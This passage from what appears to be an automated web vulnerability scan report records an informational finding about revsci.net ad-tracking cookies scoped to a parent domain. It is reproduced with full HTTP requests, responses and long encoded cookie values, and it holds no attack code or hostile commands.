Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/961894975.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=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; rsiPus__0fe="MLsXtSMNJjhvJZE469KkOkhRwa7hUMAPxrf6hJozRd8Z+A+35M/k4kuINaRiXWOqZvrBCCgV8PQmydDftp4VGNrnSUtrPUSjbgUag8IjB3bNW928CY8vrcf4As6hj1VY7tYYo6XaMjOy/KnjNO4QF6V3+avmZSgOJjmNs+AI0tedg9vyg7BbwQ+Pxa67AuRLjuH9pcyDHW+uupgKtY55s0eNk77wKDq++DmAyvYQsJ1mOBwNjHpy8o+FVxvL5xAcHK8QA9vqEIEy2fI5k+nrYb8bJKM/bNkNvscrsIDQ9QtsHI6EJm+gxHR3AsZG4NBYEU12BhUNS+ATGQ2jCfy2IiCzpUKN68+kS5SUllpnkQOiU4yA1Bhj1EISuYBB6H9q8UeY+iBMmcsRv/l0qsvyg0IsU0B6B/DDpOF4BjiLVAnfKQCiHxZpJjOXAiPwb45Co0/+12W9F06t1GZ/pYzDb77UI7D3ZVa2kG10ZD4UtePgCqKzgC9l+IrKBrntVvwyA3J1YbpJzizOmAVj5EpPfVmPPcn7gJk/+jESjZ5RhDhUQTnVtlmc4CnCJ8VD3hLIRijmJ3t/WlukvZ8MaMlYvhTw5yeEJLfHkyQHfKTmayAvD76d44bTQ4K4D/A7VZ7X04wxekj632kahAlcChWkHaKxkm8htM8EWh3K/pIuxr2v7XEAMnuyVMuvpG1Vcy/sWsur5hIjI3ESg12BI8K5hDNMMyFnyzl0UYet2EY+2NICWEjHAVKLppRbe/+CHcAAwY4Fe/LO7huaq91tegoAEMZiWb8qgmHFD6lo8wzUFzaT4hC1yeukie94vbr4OV4tn5TiyCpNN/ooxUP9wQG6qs0P6Fkbi7tRcjHO1hCyMnHmUTNL7TjO8SY2gxOVBK6mPX7FHfQWdNpKnOohpWfCOEroPCZpacpbACxM54IPE4Tk0YrKoNC3ZH/TP7FyK61ZyhZLdKqrA1LQ9a/ptuXNQdFw4VKOTDg9YUZDKpM9CXcJY/7Sisf8RN8WTGvA1g+rkk0Y28y7ngPXpRI7OX/oCGBG9uUX/e6MWjc0fRXnRkHg2ft4S9EHY9rypBZ0dgZkM7ojHM8HtvTl+vQbHvgUgY/rOBiRt6OQkQsdD1GXRUkxCgQr89U+Vqg1UjAK73o1fCcp8F9Bq5fKxyLoO8olT6ultVoxIlN2ntWo40SPyfg0tp6crdf7XW/w8Gj4upK7Dkb/7ckHlKRRByd3HkGTne5pvy+kP6TQP1NlIwj9aqFJqwp+nhA7NZKdmmk6zY9AknvLZZtPEs2Md3fI0piWJH0IInfVts25mxRc/GHfKK1b+cl+BrQg1EQoIIa0MzxfAOx7aYFRSjmPuzbakuuwbUL91vI="; rsi_us_1000000="pUM14ymnMBYY7dXKYa7+iv3EgSSw/Y8tJ+gZNnYLLHa8d4Y1v0nU65ba5IO512gB9+vbl6byANFyTJhbu+ux2S6Ywq9nUjX/Wb3v5cF/aigjeeeSChI+aJwP93mZGl8Jyh00aHNhvBDhbYzumnJQpWZIN/U3dN2SSVygr4QQRChnVJhMtivfLMv8C3AKejLQux8iTU8TlbmfbHHGIaLif0h9oj45z/Cx+U7rTV0hOBYqqi0qkeVFWn4e1f4TDVBSrl0/qHV3dHY1G/IEyQ/EEF8QAB1BEGzi5vTX3CUG82OyVjDrrTcn8g951ii/uwcdlCjChZcln/hVxdXsCuPRW58yMzEtX/23RYzOIK9j93s1xFHiYTpQfD/BZCEBrDobN712wvGrEEsgv5XgRXO/n0JfpOoLvJyhd7j3bPwRX1UCCxq0DQ/DIE5FIcf7YJAKU6FzjdlDYjmp05C2JcgBsyGqe8EBAllrUUd+/lb8iINma0JsmsStCmpQ96IUsi2WHeHHFdJbtczxxe9YtzqmlXJgOVW2N0OOtjRHHcGRgW+RjXOgjkj8rQPitJ2tY9ei5VBtAVZNZiMtI66kkHcCkZcxcpXp0k0G5RsaG6ZuhGp1TcsCM8qnoAnK5/R22SWsNEs0BL2Bd9Nt2PeKDG9fgX7uCDFLLHLV3sZhqOr6P+7cXdD3O+D6W+vTw11DUUhKee7Q26yPn1NuJYL80yE9k+I3B7OF8c6rcwzNGU5YPapEOBTIgtlYgd6R3rYuQrEacwMq9LMyNhOe9O/w7j0XlrfqyiL/TUp4sRwiIdeFXJwsNPfqnNdeBCEZM978ug78IesbrO7bSJS3eczYJyrxw58MpPpgsdss9mZEceX722dcC8dDh3zf3gGHl2Hk7gBfLSYHAGT8VWC+iP/tvOT6qvay++mLGOoka8n2mli8NtY7EQEPwup9px5myhLYgzTSkKgp8k+lr2WuWM4okUWVxgKfRSwRsdb7U0OWicRvr4P7oJ3wKSVkXQtlaKrkpXaxXne8QBrW+uuU8/1fYyjJ+G/CtrBRFzYvfrmJjjQcZzs00zwWZxuhjS47hSaXZfWhziYSHbJjT8cUj9idijTlNnAZrvYkwdgwyVP/eZooAHCjNhuHJfyzXY0CpPKUMKSvRxbKpHLXcOeRzC0H6+3mYuEJ6Rs5xq5aZaY47iTTs/rSsAyjLePSUENYGDqcO8n/B/kP5laWj27sOtUvUUKOlVVqBCwg60hU2wGAgDkh5GN1CzZJMNhSesIn12qy/QnKp0zAWtlJb7ucj+J/tiucR50ZUHQFBnPjJe33yTpCu8QxOr2Kil6OlPNN7EyKQgVhuhY9zsCxtF8+HW1I00VGbpptg7BUvC5fZTgaOrJYygsdd0LVzEwy++xqAwojOpVYl+LdjXin6lbZAD1iNUPwu2DJ9Nd/rKUMVGE0X7t+OQyz04xvfmym8i4Xs/pSES40AdX6Cz8CIKqCNyk2Wd6aDEkSMysZlkDU6hYDTXEXzIDaPIc8h6KPb2zfB8RpwPFUyz8KzuXDHtcugSUzgpVUIfBmEsulXzpd3ACZc4V8GeEQfxaZ0vg3Ny5iJT+tzBf6taQvSuL20ESIoOKwtq5w71FxjQ4PfS1ac62VNHDjRz1SOmaoX1obksm73hXeD/zKt49yhtJAd/Hzo9zO2ck4qrqDzIaBLj4rpnQOFzl53yTbKkZjnRPLfkTqekmk0FO63N+d58vGrs7cjCxS0xln3boKB2H9+OFOKJgheBCIQ4QyzN2mjAI2ni5rdsSitq7HMFYRJw=="; rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSALCT2uikdn5vw/ZUsicc4VPat72X0BRE3fmuDVJiHGaKzb2aFbVjI59eif+fODfjX2iW0zQnr2ApwL/IaWQAWmnFp60ATFgWdftKJlHNv4PL1xUaJzrH2RPUn/Xqe14cyhPjKhpKHCwKDiLN6toiqQrHtsI4MVChl3NvmUxiQ0o9IuSksnKJH+Vp14fHHA0O5QdBg3xIZFXgXUzUKUdj/ncnrXM50eg8U1wikIXFwugQAuVOPfWw3cSQz1h0xWuqUCkoeNenYtDWxFxtvOUbXzt1GJdPE/AhYNgyHY7QBmf/U8GL++uJkCFu6JWXl6rHwzClnL41OyWI9NEh2KQEYmKMMv4l/WTHM+X6x2txNGYriDvsyUgAAm20ib4YoulwLhPwBf0zWwMrA/z4+adSy8AQx9DXaeNTmC/s6HbnIYcPx43tgk7tyNv/CzYfV5FqstcqOop1zqPFXKfXvvmEm0NN7M6w6+YxBJersEqbws/ZDBnp603ZVklyBZNtps8MXjN8V1WG8p/Ok7HkTm5q7eShAm36RuqtbyoEYwmQ3qLbPZNP4YaLCsBTx+G78RIbKR4+rCv9Jj4NGZauHeS+e3S1HjhCIOr3J5UNYlbfpi0IG10pvS9C9RoHw==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47ssdu65JwXolocE02QQ4O3XYcv0liHtqFncA2iMgL2Isw+1QGSyspZz4WDbWjIKteif4fOffjX8iq0xsqPPwv6rrUdcIwSmkFGWlAUMTmYjtIJpyfP4P6/Ql+5VXlxUvEZyBSFKUS4KkscCmnNeYCSMGrDrUf+BvgDGGbJFLjv17SZArUcRrC7uZVBYf4XW1pVfJOHtW0A4KYh9LaIj+x0G4F9zRU+sOohe7OqAUbNvDCQtVo1G6MP6Vy3i752mR8CD5MOaWITT19GmvAHjLO26lbm5fFWrFFMTh5ZgLXiQRjSAdYmdmJxcwmcndbW5GD4QQZOLlE8oZWjFM67BWIP270Sg+rxtsJ21UcoLDyljRZUGiMCPdO16hfc+goh8mSOFKvEaKvG6xta9uKPqvtvA3CVbdeEkhIJ3TjyZrGG6sqwQ+LrbJlL2uqw6tCbi55Z1G4L76xaNQuxpP0iKeULJPEv5fkk8iaittLGEZxTkfFXA58QKuxsoi2qtRtkE7SWndRo4C+Co7u6uHF8hU2HcPVGXSlULnuApfy5eUq8Bac3Q/l/KPuVhm3K080yOHYUlqz0da0TwsEKt8NLUoeiNILawsWTBVqe672cNE2Ew3cY6ZSVQqduHB88tXw/bwNMQ=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:10:22 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 13:10:21 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.213. http://pix04.revsci.net/I10985/b3/0/3/1008211/97296821.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/97296821.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5MOhunIMpzaBv3Bh9+z8rsB4rOfq5QsJKQ25ayViGymJW18v6oxo5TQQ/CGgK6H8il2W9QBKJhTycj5xS4V0a4TNPNDPv1QWh8gkmOOsH9rraddoccklFmNdAYOTGYvtIJB6bP4P6/Il+5XrH+SP65GfIkcTktT+ixZsRa1DGnHu9HmUsTwsj+b4TSHPCO16C76Jgxbq9AgilVXSOe7YLMp6xwab1BrpZaOWmsitT5dU9IfLwuNg89QDwPBAC4ur48OcOcA1xi2GVNLDOnn9+ZVEkHb0IOQppkywim9r6oMCsyGp5QINfekp4OAtoWFhe8LaMNd0oNIrrqTsPSnLC9jHHtZCIc3jQS5IOTrrEInfpEWiCeiIahqNuFuKBQ4qweMCtY2r/KLXEYgCpNCMa/33M1Me2skHCgHAZdUYutFVDjHY8aZA3RQeILFC3MEFNa5BpNqaDlanI5eI8Z1cnxxtC4vTtpm6rHLBHrTrq/n/HqXwP/lHd+mEVwBG90W93W0aM1bW2AmFNr9jZUSYx0WIrLl9aQ0nBEt+ud5w7ywePV9vyQTYia6nuRVrI7yWGmvWLeiMUNeSXFaR32t1Om8q1dSr7ZIhW/DF8cZk+Q7Jz1CGHE6bVWqfEeqNOPhxoxmC/yS0id7nsNMi58LqbR9vXG4DhGiHEw==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 12:09:22 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/97296821.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252F%253F_rsiL%253D0%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1adad3&9&10133,10640,10654,10670,10448,10450,10451,10452,10454&4df43073&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; 